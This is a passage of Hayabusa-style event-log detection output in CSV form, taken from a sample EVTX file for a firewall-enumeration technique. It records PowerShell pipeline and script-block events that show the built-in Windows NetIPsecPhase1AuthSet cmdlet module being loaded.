value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Get-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletizati",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"on_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
